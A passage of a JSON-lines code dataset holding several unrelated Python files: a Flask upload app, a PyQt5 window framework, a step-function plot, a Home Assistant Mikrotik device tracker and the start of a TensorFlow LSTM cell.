predicted_events\n","repo_name":"zqhuang2014/CatKit","sub_path":"catkit/gen/analysis/reconfiguration.py","file_name":"reconfiguration.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"7882575632","text":"import ast\n\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request, redirect, url_for\nfrom PIL import Image\n\napp = Flask(__name__)\n\n@app.route('/hello/')\n@app.route('/hello/')\ndef hello_world(user=None): # put application's code here\n return render_template('hello.html', user=user)\n\n@app.route('/end')\ndef end_world():\n return render_template('end.html')\n\n@app.route('/ai', methods=['GET', 'POST'])\ndef ai():\n if request.method == 'POST':\n file = 
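# --- Editor's note (not part of the dataset records): the Costreg/gradient
# pair in the Titanic record above relies on np.matrix, which NumPy
# discourages, and its `epsilon = 0` leaves the log() calls unprotected when
# the sigmoid saturates to exactly 0 or 1. An equivalent plain-ndarray
# sketch of the regularized cost (bias term excluded from the penalty, as in
# the original); cost_reg is a hypothetical name:
import numpy as np

def cost_reg(theta, X, y, lam, eps=1e-15):
    h = 1.0 / (1.0 + np.exp(-X @ theta))          # sigmoid, shape (m,)
    m = len(X)
    ce = -(y * np.log(h + eps) + (1 - y) * np.log(1 - h + eps)).mean()
    penalty = lam / (2 * m) * np.sum(theta[1:] ** 2)  # skip bias theta[0]
    return ce + penalty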
request.files['file']\n if file:\n img = Image.open(request.files['file'].stream)\n parcel = {\n \"width\": img.width,\n \"height\": img.height\n }\n return redirect(url_for('diagram', parcel=parcel))\n return render_template('ai.html')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/diagram/')\n@app.route('/diagram/')\ndef diagram(parcel=None):\n dict = ast.literal_eval(parcel)\n return render_template('diagram.html', parcel=dict)\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Affamen/NN_Site","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27965682546","text":"# import sys\n# a = sys.stdin.readline()\n# aa = set(sys.stdin.readline().rstrip().split(\" \"))\n# b = sys.stdin.readline()\n# bb = sys.stdin.readline().rstrip().split(\" \")\n\n# for i in bb:\n# if i in aa:\n# print(1)\n# else:\n# print(0)\n\n# a = int(input())\n# a_list = []\n# for i in range(a):\n# a,b = map(int, input().split())\n# a_list.append([a,b])\n# b_list = sorted(a_list, key = lambda x : x[1])\n# b_list = sorted(b_list, key = lambda x : x[0])\n# for i in b_list:\n# print(i[0],i[1])\n\n# the_num = int(input())\n# a_list = []\n# for i in range(the_num):\n# a = input().split()\n# a[0] = int(a[0])\n# a.append(i)\n# a_list.append(a)\n# a = sorted(a_list, key= lambda x : x[2])\n# a = sorted(a, key= lambda x : x[0])\n# for i in a:\n# print(i[0],i[1])\n# 백준기준 31923위\n\nimport sys\n\na = sys.stdin.readline().rstrip().split()\nstart = int(a[0])\njump = int(a[1])\ncount =0\na_list = []\nwhile True:\n count+=1\n if jump*count < start:\n if jump*count not in a_list:\n a_list.append(jump*count)\n a_list.append(start-jump*count)\n else:\n jump=jump-1\n count = 0\n\n\n\n\n\n ","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2021/11월/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19417943862","text":"from PyQt5 import Qt, QtCore\nfrom enum import Enum\nimport copy\n\nfrom app.core.utils import SingletonDecorator\nfrom app.core import model as sc\nfrom app.core.ui.processingDialog import ProcessingDialog\n\n\nclass DockAreaId(Enum):\n Top = Qt.Qt.TopDockWidgetArea\n Bottom = Qt.Qt.BottomDockWidgetArea\n Right = Qt.Qt.RightDockWidgetArea\n Left = Qt.Qt.LeftDockWidgetArea\n\n\n@SingletonDecorator\nclass MainWindow(Qt.QMainWindow):\n def __init__(self, parent=None, title=None):\n Qt.QMainWindow.__init__(self, parent)\n self.setAttribute(Qt.Qt.WA_DeleteOnClose)\n\n self._actions = dict()\n\n self._initMenu()\n\n self._initDock()\n\n self._initCentralWidget()\n\n self._windowMenu = None\n self._dockOptionMenu = None\n self._activeWindowMenu = None\n\n if title is not None:\n if not isinstance(title, str):\n raise TypeError(\"String expected\")\n self.setWindowTitle(title)\n\n # =============================================================================\n # Funciones de inicialización\n # =============================================================================\n\n def _initMenu(self):\n self._menus = dict()\n _menuBar = self.menuBar()\n _menuBar.setNativeMenuBar(False)\n self._menus[None] = _menuBar\n\n self.addAction(\"&New\", shortcut=(QtCore.Qt.Key_N | QtCore.Qt.CTRL))\n self.addAction(\"&Load\", shortcut=(QtCore.Qt.Key_L | QtCore.Qt.CTRL))\n self.addAction(\"&Save\", shortcut=(QtCore.Qt.Key_S | 
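# --- Editor's note (not part of the dataset records): the Flask record above
# round-trips a dict through the URL as str(dict) and parses it back with
# ast.literal_eval, which couples the route to Python's repr format (and the
# local name `dict` shadows the builtin). The duplicated bare decorators
# also suggest the original `/diagram/<parcel>` and `/hello/<user>` path
# segments were stripped during extraction. A sketch that passes the two
# fields as ordinary query parameters instead; this is a redesign, not the
# record's own API:
from flask import Flask, render_template, request, redirect, url_for

app = Flask(__name__)

@app.route('/diagram/')
def diagram():
    parcel = {
        "width": request.args.get("width", type=int),
        "height": request.args.get("height", type=int),
    }
    return render_template('diagram.html', parcel=parcel)

# and in the upload handler:
#     return redirect(url_for('diagram', width=img.width, height=img.height))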
QtCore.Qt.CTRL))\n self.addAction(\"&Quit\", shortcut=(QtCore.Qt.Key_Q | QtCore.Qt.CTRL))\n\n self.addAction2Menu(\"&New\", [\"Scene\"])\n self.addAction2Menu(\"&Load\", [\"Scene\"])\n self.addAction2Menu(\"&Save\", [\"Scene\"])\n self.addAction2Menu(\"&Quit\", [\"Scene\"])\n\n def newScene():\n ok = self.confirmMsg(\"Are you sure you want to create a new Scene?\",\n info=\"Any unsaved changes will be lost\")\n\n if ok: sc.Scene().new()\n\n def loadScene():\n ok = self.confirmMsg(\"Are you sure you want to load a Scene?\",\n info=\"Any unsaved changes will be lost\")\n if ok:\n fn = self.loadFileDialog(filters=[\"Scene (*.scn)\",\n \"All Files (*)\"])\n\n if fn is not None:\n\n def load():\n if not sc.Scene().loadz(fn[0]):\n raise IOError(fn[0])\n\n if not self.processDialog(cb=load, isICB=False,\n wtitle=\"Loading...\",\n title=\"Loading scene...\",\n closeOnFinished=True,\n hideConsole=True):\n self.warningMsg(\"The scene file cannot be opened\")\n\n def saveScene():\n fn = self.saveFileDialog(filters=[\"Scene (*.scn)\",\n \"All Files (*)\"])\n\n if fn is not None:\n def save():\n if not sc.Scene().savez(fn[0]):\n raise IOError(fn[0])\n\n if not self.processDialog(cb=save, isICB=False,\n wtitle=\"Saving...\",\n title=\"Saving scene...\",\n closeOnFinished=True,\n hideConsole=True):\n self.warningMsg(\"The scene file cannot be writte\")\n\n self.addActionCB(\"&New\", newScene)\n self.addActionCB(\"&Load\", loadScene)\n self.addActionCB(\"&Save\", saveScene)\n self.addActionCB(\"&Quit\", self.close)\n\n def _initDock(self):\n self.setDockOptions(self.dockOptions() |\n Qt.QMainWindow.AllowNestedDocks |\n Qt.QMainWindow.GroupedDragging)\n self._docks = []\n\n self.setStyleSheet('''QMainWindow::separator {\n \t\tbackground: rgb(100, 100, 100);\n \t\twidth: 4px;\n \t\theight: 4px;}''')\n\n # self.setStyleSheet('''QDockWidget {padding-left: 10px;\n # padding-right: 10px;\n # border-style: outset;\n # border-width: 4px;\n # border-color: black;}''')\n # border: 10px solid lightgray; background: black}''')\n\n def _initCentralWidget(self):\n self._centralWidget = Qt.QTabWidget(self)\n self.setCentralWidget(self._centralWidget)\n self._centralWidget.hide()\n self._tabs = []\n\n # =============================================================================\n # Gestión de acciones y menus\n # =============================================================================\n\n def createWindowMenu(self, menuPath=None, mainWindowConfig=True):\n if menuPath is not None:\n if not isinstance(menuPath, str):\n if not isinstance(menuPath, list) or \\\n all(isinstance(i, str) for i in menuPath):\n raise TypeError(\"String or list of strings expected\")\n else:\n mp = menuPath\n else:\n mp = [menuPath]\n else:\n mp = [\"Window\"]\n\n # ''.join(random.choices(string.ascii_uppercase + string.digits, k=N))\n pf = \"_&%234&&_\"\n self._pf = pf\n\n self._windowMenu = self.createMenu(menuPath=mp)\n self._activeWindowMenu = self.createPopupMenu()\n\n action = self._windowMenu.addMenu(self._activeWindowMenu)\n action.setText(\"Active Windows\")\n\n if mainWindowConfig:\n self._windowMenu.addSeparator()\n mp.append(\"Dock Options\")\n self._dockOptionMenu = self.createMenu(menuPath=mp)\n\n def setOptions():\n if self._dockOptionMenu is None: return\n\n opts = Qt.QMainWindow.DockOption(0)\n actions = self._dockOptionMenu.actions()\n optsList = (Qt.QMainWindow.AnimatedDocks,\n Qt.QMainWindow.AllowNestedDocks,\n Qt.QMainWindow.AllowTabbedDocks,\n Qt.QMainWindow.ForceTabbedDocks,\n Qt.QMainWindow.VerticalTabs,\n 
Qt.QMainWindow.GroupedDragging)\n\n for a, o in zip(actions, optsList):\n if a.isChecked(): opts = opts | o\n\n self.setDockOptions(opts)\n\n def addAction(name, prop):\n action = self.addAction(name, prefix=pf)\n self.addAction2Menu(name, menuPath=mp, prefix=pf)\n action.setCheckable(True);\n action.setChecked(self.dockOptions() & prop)\n self.addActionCB(name, setOptions, prefix=pf)\n\n addAction(\"Animated docks\", Qt.QMainWindow.AnimatedDocks)\n addAction(\"Allow nested docks\", Qt.QMainWindow.AllowNestedDocks)\n addAction(\"Allow tabbed docks\", Qt.QMainWindow.AllowTabbedDocks)\n addAction(\"Force tabbed docks\", Qt.QMainWindow.ForceTabbedDocks)\n addAction(\"Top tabs\", Qt.QMainWindow.VerticalTabs)\n addAction(\"Grouped dragging\", Qt.QMainWindow.GroupedDragging)\n\n def addAction(self, name, prefix=None, icon=None, shortcut=None):\n key = prefix + name if prefix is not None else name\n\n entry = self._actions.get(key)\n if entry is None:\n action = Qt.QAction(self)\n action.setText(name)\n\n entry = {'action': action, 'triggerCBs': None}\n\n def func():\n cb = self._actions[key]['triggerCBs']\n if cb is not None:\n cb()\n\n setattr(self, \"_\" + key, Qt.pyqtSlot()(func))\n action.triggered.connect(getattr(self, \"_\" + key))\n # action.toggled.connect(getattr(self,\"_\"+key))\n\n self._actions[key] = entry\n\n else:\n action = entry['action']\n\n if icon is not None:\n action.setIcon(icon)\n\n if shortcut is not None:\n action.setShortcut(shortcut)\n\n self._actions[key]['action'] = action\n\n return action\n\n def addActionCB(self, name, cb, prefix=None):\n key = prefix + name if prefix is not None else name\n if (self._actions.get(key)) is None: return None\n\n entry = self._actions[key]\n entry['triggerCBs'] = cb\n\n return entry['action']\n\n def getMenu(self, menuPath=None):\n if menuPath is None:\n return self._menus.get(None)\n else:\n self._menus.get(tuple(menuPath))\n\n def createMenu(self, menuPath=None):\n if menuPath is None: menuPath = list()\n menu = None\n\n stack = copy.copy(menuPath)\n toCreate = list()\n\n for i in range(len(menuPath)):\n menu = self._menus.get(tuple(stack))\n if menu is not None:\n break\n\n toCreate.append(stack.pop(-1))\n\n if menu is None:\n menu = self._menus.get(None)\n\n toCreate.reverse()\n for item in toCreate:\n stack.append(item)\n menu = menu.addMenu(item)\n self._menus[tuple(stack)] = menu\n\n return menu\n\n def addAction2Menu(self, name, menuPath=None, prefix=None):\n key = prefix + name if prefix is not None else name\n if (self._actions.get(key)) is None: return\n\n menu = self.createMenu(menuPath=menuPath)\n menu.addAction(self._actions[key]['action'])\n\n # def addAction2Toolbar(name,toolbarName):\n # pass\n #\n\n # =============================================================================\n # Ventanas modales\n # =============================================================================\n @staticmethod\n def warningMsg(msg):\n # !todo: Asegurar que se borran al concluir sin llamar a deleteLater\n # https://www.tutorialspoint.com/pyqt/pyqt_qmessagebox.htm\n msgBox = Qt.QMessageBox()\n msgBox.setText(msg)\n msgBox.setWindowTitle(\"Warning\")\n msgBox.setIcon(Qt.QMessageBox.Warning)\n msgBox.setWindowFlags(msgBox.windowFlags() &\n ~Qt.Qt.WindowCloseButtonHint)\n return msgBox.exec()\n\n @staticmethod\n def confirmMsg(question, info=None):\n msgBox = Qt.QMessageBox()\n msgBox.setText(question)\n msgBox.setInformativeText(info)\n msgBox.setWindowTitle(\"Please, confirm operation\")\n msgBox.setIcon(Qt.QMessageBox.Question)\n 
msgBox.setWindowFlags(msgBox.windowFlags() &\n ~Qt.Qt.WindowCloseButtonHint)\n msgBox.setStandardButtons(Qt.QMessageBox.Ok | Qt.QMessageBox.Cancel)\n msgBox.setEscapeButton(Qt.QMessageBox.Cancel)\n msgBox.setDefaultButton(Qt.QMessageBox.Cancel)\n\n return msgBox.exec() == Qt.QMessageBox.Ok\n\n @staticmethod\n def processDialog(cb,\n isICB,\n wtitle=None,\n title=None,\n iconNum=1,\n finishMsg=None,\n terminateMsg=None,\n closeOnFinished=True,\n closeButtonEnabled=True,\n hideConsole=False,\n hideProgressBar=False):\n\n w = ProcessingDialog(title=title, iconNum=iconNum)\n w.setWindowTitle(wtitle)\n w.closeOnFinished = closeOnFinished\n w.closeButtonEnabled = closeButtonEnabled\n w.hideConsole = hideConsole\n w.hideProgressBar = hideProgressBar\n\n if finishMsg is not None:\n w.finishMsg = finishMsg\n else:\n w.finishMsg = \\\n \"\"\"\n #################################\n ## Finalizado\n #################################\n \"\"\"\n\n if terminateMsg is not None:\n w.terminateMsg = terminateMsg\n else:\n w.terminateMsg = \\\n \"\"\"\n #################################\n ## Terminate\n #################################\n \"\"\"\n\n if isICB:\n r = w.execICB(cb)\n else:\n r = w.execCB(cb)\n\n return r == Qt.QDialog.Accepted\n\n @staticmethod\n def loadFileDialog(filters=None, dir_=None, title=\"Please, select a valid file\"):\n dialog = Qt.QFileDialog()\n dialog.setWindowTitle(title)\n dialog.setFileMode(Qt.QFileDialog.ExistingFile)\n dialog.setAcceptMode(Qt.QFileDialog.AcceptOpen)\n\n if dir_ is None: dir_ = \".\"\n dialog.setDirectory(dir_)\n\n if filters is not None:\n dialog.setNameFilters(filters)\n\n if dialog.exec():\n fileName = dialog.selectedFiles()\n if (len(fileName) == 0):\n return None\n else:\n return fileName\n else:\n return None\n\n @staticmethod\n def saveFileDialog(filters=None, dir_=None):\n dialog = Qt.QFileDialog()\n dialog.setWindowTitle(\"Please, select a file\")\n dialog.setFileMode(Qt.QFileDialog.AnyFile)\n dialog.setAcceptMode(Qt.QFileDialog.AcceptSave)\n\n if dir_ is None: dir_ = \".\"\n dialog.setDirectory(dir_)\n\n if filters is not None:\n dialog.setNameFilters(filters)\n\n if dialog.exec():\n fileName = dialog.selectedFiles()\n if (len(fileName) == 0):\n return None\n else:\n return fileName\n else:\n return None\n\n @staticmethod\n def saveDirectoryDialog(dir_=None):\n dialog = Qt.QFileDialog()\n\n if dir_ is None: dir_ = \".\"\n dialog.setDirectory(dir_)\n\n fileName = dialog.getExistingDirectory()\n if (len(fileName) == 0):\n return None\n else:\n return fileName\n\n # =============================================================================\n # Gestión de ventanas\n # =============================================================================\n\n def createDockableWidget(self, widget, title, dockAreaId=None,\n hideOnClose=True):\n\n if dockAreaId is None:\n dockAreaId = DockAreaId.Right\n\n dock = Qt.QDockWidget(title, self)\n\n # !todo: is really necesary\n widget.setParent(dock)\n dock.setWidget(widget)\n dock.setFloating(False)\n self._docks.append(dock)\n\n nfound = True\n for d in self._docks:\n if self.dockWidgetArea(d) == dockAreaId.value:\n dock.show()\n self.tabifyDockWidget(d, dock)\n\n nfound = False\n break\n\n if nfound: self.addDockWidget(dockAreaId.value, dock)\n\n if self._activeWindowMenu is not None:\n actions = self.createPopupMenu().actions()\n for a in actions:\n self._activeWindowMenu.addAction(a)\n\n if not hideOnClose:\n # dock.setAttribute(Qt.Qt.WA_DeleteOnClose)\n def closeButtonClk(bool):\n\n ok = self.confirmMsg(\n \"Do you 
really want to close this window?\\n\" +\n \"Unsaved changes will be lost\")\n\n if ok:\n dock.hide()\n #dock.setAttribute(Qt.Qt.WA_DeleteOnClose)\n dock.close()\n else:\n dock.show()\n\n b = dock.findChildren(Qt.QAbstractButton,\n \"qt_dockwidget_closebutton\")[0]\n b.clicked.connect(copy.copy(closeButtonClk))\n\n return dock\n\n def createCentralTab(self, widget, title, icon=None):\n self._tabs.append(widget)\n return self._centralWidget.addTab(widget, title)\n\n\nif __name__ == '__main__':\n import sys\n import time\n\n app = Qt.QApplication(sys.argv)\n ex = MainWindow()\n ex2 = MainWindow() # prueba singleton\n\n for i in range(3):\n listWidget = Qt.QListWidget()\n listWidget.addItem(\"item1\")\n listWidget.addItem(\"item2\")\n listWidget.addItem(\"item3\")\n\n ex.createDockableWidget(listWidget, \"R\" + str(i))\n\n for i in range(3):\n listWidget = Qt.QListWidget()\n listWidget.addItem(\"item1\")\n listWidget.addItem(\"item2\")\n listWidget.addItem(\"item3\")\n ex2.createDockableWidget(listWidget, \"L\" + str(i),\n dockAreaId=DockAreaId.Left)\n for i in range(3):\n listWidget = Qt.QListWidget()\n listWidget.addItem(\"item1\")\n listWidget.addItem(\"item2\")\n listWidget.addItem(\"item3\")\n ex2.createCentralTab(listWidget, \"C\" + str(i))\n\n ex.show()\n\n\n def test():\n for i in range(10):\n yield i * 10\n print(i)\n time.sleep(1)\n\n\n print(ex.processDialog(test,\n True,\n wtitle=None,\n title=None,\n iconNum=1,\n finishMsg=None,\n terminateMsg=None,\n closeOnFinished=False,\n closeButtonEnabled=True,\n hideConsole=False,\n hideProgressBar=False))\n\n sys.exit(app.exec())\n","repo_name":"NCToader/DeepSpineTool","sub_path":"app/core/ui/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":17738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23079154867","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 17 08:54:31 2023\n\n@author: sebas\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef step_function(x):\n return np.where(x >= 0, 1, 0)\n\n# Generar valores de x en el rango de -10 a 10\nx = np.linspace(-2, 2, 100)\n\n# Calcular los valores de y para la función escalón\ny1 = step_function(x)\n\n# Calcular los valores de y para la función escalón desplazada\ny2 = step_function(x - 0.5)\nfig, ax = plt.subplots(figsize=(10, 6))\n# Graficar ambas funciones en el mismo plot\n#plt.plot(x, y1, color='blue', label='sin bias')\nplt.plot(x, y2, color='red') #label='con bias')\n\n# Agregar títulos y leyendas\nplt.title('Gráfico de los valores de salida', fontweight='bold')\nplt.xlabel('w*x', fontweight='bold')\nplt.ylabel('Magnitud', fontweight='bold')\nplt.legend()\nax.grid(True)\n# Mostrar el gráfico\nplt.show()\n","repo_name":"sebas2868/Paper-MLP","sub_path":"Codigos/Función escalón desplazada.py","file_name":"Función escalón desplazada.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32599740060","text":"\"\"\"Support for the Mikrotik Router device tracker.\"\"\"\n\nimport logging\nfrom typing import Any, Dict\nfrom datetime import timedelta\n\nfrom homeassistant.components.device_tracker.config_entry import ScannerEntity\nfrom homeassistant.components.device_tracker.const import SOURCE_TYPE_ROUTER\nfrom homeassistant.const import (\n CONF_NAME,\n ATTR_ATTRIBUTION,\n)\nfrom homeassistant.core import callback\nfrom homeassistant.helpers.device_registry import 
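# --- Editor's note (not part of the dataset records): the MainWindow class
# in the DeepSpineTool record above registers menu entries in three steps:
# create the QAction, attach it to a menu path, then bind a callback. A
# minimal usage sketch against that visible API (the window title, menu
# name, and action name are illustrative):
from PyQt5 import Qt
import sys

app = Qt.QApplication(sys.argv)
win = MainWindow(title="Demo")

win.addAction("&Export")                    # 1. create the QAction
win.addAction2Menu("&Export", ["Tools"])    # 2. place it under a Tools menu
win.addActionCB("&Export", lambda: print("exporting..."))  # 3. bind callback

win.show()
sys.exit(app.exec())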
CONNECTION_NETWORK_MAC\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\nfrom homeassistant.util.dt import get_age, utcnow\n\nfrom .const import (\n DOMAIN,\n DATA_CLIENT,\n ATTRIBUTION,\n CONF_TRACK_HOSTS,\n DEFAULT_TRACK_HOSTS,\n CONF_TRACK_HOSTS_TIMEOUT,\n DEFAULT_TRACK_HOST_TIMEOUT,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nDEVICE_ATTRIBUTES_HOST = [\n \"host-name\",\n \"address\",\n \"mac-address\",\n \"interface\",\n \"source\",\n \"last-seen\",\n]\n\n\n# ---------------------------\n# format_attribute\n# ---------------------------\ndef format_attribute(attr):\n res = attr.replace(\"-\", \" \")\n res = res.capitalize()\n res = res.replace(\" ip \", \" IP \")\n res = res.replace(\" mac \", \" MAC \")\n res = res.replace(\" mtu\", \" MTU\")\n return res\n\n\n# ---------------------------\n# format_value\n# ---------------------------\ndef format_value(res):\n res = res.replace(\"dhcp\", \"DHCP\")\n res = res.replace(\"dns\", \"DNS\")\n res = res.replace(\"capsman\", \"CAPsMAN\")\n res = res.replace(\"wireless\", \"Wireless\")\n res = res.replace(\"restored\", \"Restored\")\n return res\n\n\n# ---------------------------\n# async_setup_entry\n# ---------------------------\nasync def async_setup_entry(hass, config_entry, async_add_entities):\n \"\"\"Set up device tracker for Mikrotik Router component.\"\"\"\n inst = config_entry.data[CONF_NAME]\n mikrotik_controller = hass.data[DOMAIN][DATA_CLIENT][config_entry.entry_id]\n tracked = {}\n\n @callback\n def update_controller():\n \"\"\"Update the values of the controller.\"\"\"\n update_items(\n inst, config_entry, mikrotik_controller, async_add_entities, tracked\n )\n\n mikrotik_controller.listeners.append(\n async_dispatcher_connect(\n hass, mikrotik_controller.signal_update, update_controller\n )\n )\n\n update_controller()\n\n\n# ---------------------------\n# update_items\n# ---------------------------\n@callback\ndef update_items(inst, config_entry, mikrotik_controller, async_add_entities, tracked):\n \"\"\"Update tracked device state from the controller.\"\"\"\n new_tracked = []\n\n # Add switches\n for sid, sid_uid, sid_name, sid_ref, sid_func in zip(\n # Data point name\n [\"host\"],\n # Data point unique id\n [\"mac-address\"],\n # Entry Name\n [\"host-name\"],\n # Entry Unique id\n [\"mac-address\"],\n # Tracker function\n [\n MikrotikControllerHostDeviceTracker,\n ],\n ):\n for uid in mikrotik_controller.data[sid]:\n if (\n # Skip if host tracking is disabled\n sid == \"host\"\n and not config_entry.options.get(CONF_TRACK_HOSTS, DEFAULT_TRACK_HOSTS)\n ):\n continue\n\n # Update entity\n item_id = f\"{inst}-{sid}-{mikrotik_controller.data[sid][uid][sid_uid]}\"\n _LOGGER.debug(\"Updating device_tracker %s\", item_id)\n if item_id in tracked:\n if tracked[item_id].enabled:\n tracked[item_id].async_schedule_update_ha_state()\n continue\n\n # Create new entity\n sid_data = {\n \"sid\": sid,\n \"sid_uid\": sid_uid,\n \"sid_name\": sid_name,\n \"sid_ref\": sid_ref,\n }\n tracked[item_id] = sid_func(\n inst, uid, mikrotik_controller, config_entry, sid_data\n )\n new_tracked.append(tracked[item_id])\n\n # Register new entities\n if new_tracked:\n async_add_entities(new_tracked)\n\n\n# ---------------------------\n# MikrotikControllerDeviceTracker\n# ---------------------------\nclass MikrotikControllerDeviceTracker(ScannerEntity):\n \"\"\"Representation of a device tracker.\"\"\"\n\n def __init__(self, inst, uid, mikrotik_controller, config_entry, sid_data):\n \"\"\"Set up a device tracker.\"\"\"\n 
self._sid_data = sid_data\n self._inst = inst\n self._ctrl = mikrotik_controller\n self._data = mikrotik_controller.data[self._sid_data[\"sid\"]][uid]\n self._config_entry = config_entry\n\n self._attrs = {\n ATTR_ATTRIBUTION: ATTRIBUTION,\n }\n\n @property\n def entity_registry_enabled_default(self):\n \"\"\"Return if the entity should be enabled when first added to the entity registry.\"\"\"\n return True\n\n async def async_added_to_hass(self):\n \"\"\"Run when entity about to be added to hass.\"\"\"\n _LOGGER.debug(\n \"New device tracker %s (%s %s)\",\n self._inst,\n self._sid_data[\"sid\"],\n self._data[self._sid_data[\"sid_uid\"]],\n )\n\n async def async_update(self):\n \"\"\"Synchronize state with controller.\"\"\"\n\n @property\n def source_type(self) -> str:\n \"\"\"Return the source type of the port.\"\"\"\n return SOURCE_TYPE_ROUTER\n\n @property\n def name(self) -> str:\n \"\"\"Return the name.\"\"\"\n if self._sid_data[\"sid\"] == \"interface\":\n return f\"{self._inst} {self._data[self._sid_data['sid_name']]}\"\n\n return f\"{self._data[self._sid_data['sid_name']]}\"\n\n @property\n def unique_id(self) -> str:\n \"\"\"Return a unique id for this entity.\"\"\"\n return f\"{self._inst.lower()}-{self._sid_data['sid']}-{self._data[self._sid_data['sid_ref']]}\"\n\n @property\n def available(self) -> bool:\n \"\"\"Return if controller is available.\"\"\"\n return self._ctrl.connected()\n\n @property\n def device_info(self) -> Dict[str, Any]:\n \"\"\"Return a description for device registry.\"\"\"\n info = {\n \"connections\": {\n (CONNECTION_NETWORK_MAC, self._data[self._sid_data[\"sid_ref\"]])\n },\n \"manufacturer\": self._ctrl.data[\"resource\"][\"platform\"],\n \"model\": self._ctrl.data[\"resource\"][\"board-name\"],\n \"name\": self._data[self._sid_data[\"sid_name\"]],\n }\n if self._sid_data[\"sid\"] == \"interface\":\n info[\"name\"] = f\"{self._inst} {self._data[self._sid_data['sid_name']]}\"\n return info\n\n @property\n def device_state_attributes(self) -> Dict[str, Any]:\n \"\"\"Return the state attributes.\"\"\"\n attributes = self._attrs\n return attributes\n\n @property\n def is_connected(self) -> bool:\n return False\n\n\n# ---------------------------\n# MikrotikControllerHostDeviceTracker\n# ---------------------------\nclass MikrotikControllerHostDeviceTracker(MikrotikControllerDeviceTracker):\n \"\"\"Representation of a network device.\"\"\"\n\n def __init__(self, inst, uid, mikrotik_controller, config_entry, sid_data):\n \"\"\"Set up tracked port.\"\"\"\n super().__init__(inst, uid, mikrotik_controller, config_entry, sid_data)\n\n @property\n def option_track_network_hosts(self):\n \"\"\"Config entry option to not track ARP.\"\"\"\n return self._config_entry.options.get(CONF_TRACK_HOSTS, DEFAULT_TRACK_HOSTS)\n\n @property\n def option_track_network_hosts_timeout(self):\n \"\"\"Config entry option scan interval.\"\"\"\n track_network_hosts_timeout = self._config_entry.options.get(\n CONF_TRACK_HOSTS_TIMEOUT, DEFAULT_TRACK_HOST_TIMEOUT\n )\n return timedelta(seconds=track_network_hosts_timeout)\n\n @property\n def is_connected(self) -> bool:\n \"\"\"Return true if the host is connected to the network.\"\"\"\n if not self.option_track_network_hosts:\n return False\n\n if self._data[\"source\"] in [\"capsman\", \"wireless\"]:\n return self._data[\"available\"]\n\n if (\n self._data[\"last-seen\"]\n and (utcnow() - self._data[\"last-seen\"])\n < self.option_track_network_hosts_timeout\n ):\n return True\n return False\n\n @property\n def available(self) -> bool:\n 
\"\"\"Return if controller is available.\"\"\"\n if not self.option_track_network_hosts:\n return False\n\n return self._ctrl.connected()\n\n @property\n def icon(self) -> str:\n \"\"\"Return the icon.\"\"\"\n if self._data[\"source\"] in [\"capsman\", \"wireless\"]:\n if self._data[\"available\"]:\n return \"mdi:lan-connect\"\n else:\n return \"mdi:lan-disconnect\"\n\n if (\n self._data[\"last-seen\"]\n and (utcnow() - self._data[\"last-seen\"])\n < self.option_track_network_hosts_timeout\n ):\n return \"mdi:lan-connect\"\n return \"mdi:lan-disconnect\"\n\n @property\n def device_state_attributes(self) -> Dict[str, Any]:\n \"\"\"Return the state attributes.\"\"\"\n attributes = self._attrs\n for variable in DEVICE_ATTRIBUTES_HOST:\n if variable not in self._data:\n continue\n\n if variable == \"last-seen\":\n if self._data[variable]:\n attributes[format_attribute(variable)] = get_age(\n self._data[variable]\n )\n else:\n attributes[format_attribute(variable)] = \"unknown\"\n else:\n if self._data[variable] in [\n \"dhcp\",\n \"dns\",\n \"capsman\",\n \"wireless\",\n \"restored\",\n ]:\n attributes[format_attribute(variable)] = format_value(\n self._data[variable]\n )\n else:\n attributes[format_attribute(variable)] = self._data[variable]\n\n return attributes\n\n @property\n def device_info(self) -> Dict[str, Any]:\n \"\"\"Return a description for device registry.\"\"\"\n info = {\n \"connections\": {\n (CONNECTION_NETWORK_MAC, self._data[self._sid_data[\"sid_ref\"]])\n },\n \"default_name\": self._data[self._sid_data[\"sid_name\"]],\n }\n if self._data[\"manufacturer\"] != \"\":\n info[\"manufacturer\"] = self._data[\"manufacturer\"]\n\n if self._sid_data[\"sid\"] == \"interface\":\n info[\"name\"] = f\"{self._inst} {self._data[self._sid_data['sid_name']]}\"\n\n return info\n","repo_name":"BeardedTinker/Home-Assistant_config_rec","sub_path":"custom_components/mikrotik_router/device_tracker.py","file_name":"device_tracker.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2521819898","text":"import tensorflow as tf\n\ndef ln(tensor, scope = None, epsilon = 1e-5):\n \"\"\" Layer normalizes a 2D tensor along its second axis \"\"\"\n assert(len(tensor.get_shape()) == 2)\n m, v = tf.nn.moments(tensor, [1], keep_dims=True)\n if not isinstance(scope, str):\n scope = ''\n with tf.variable_scope(scope + 'layer_norm'):\n scale = tf.get_variable('scale',\n shape=[tensor.get_shape()[1]],\n initializer=tf.constant_initializer(1))\n shift = tf.get_variable('shift',\n shape=[tensor.get_shape()[1]],\n initializer=tf.constant_initializer(0))\n LN_initial = (tensor - m) / tf.sqrt(v + epsilon)\n\n return LN_initial * scale + shift\n\nfrom tensorflow.contrib.rnn.python.ops.rnn_cell import _linear\n\nclass MultiDimentionalLSTMCell(tf.contrib.rnn.RNNCell):\n \"\"\"\n Adapted from TF's BasicLSTMCell to use Layer Normalization.\n Note that 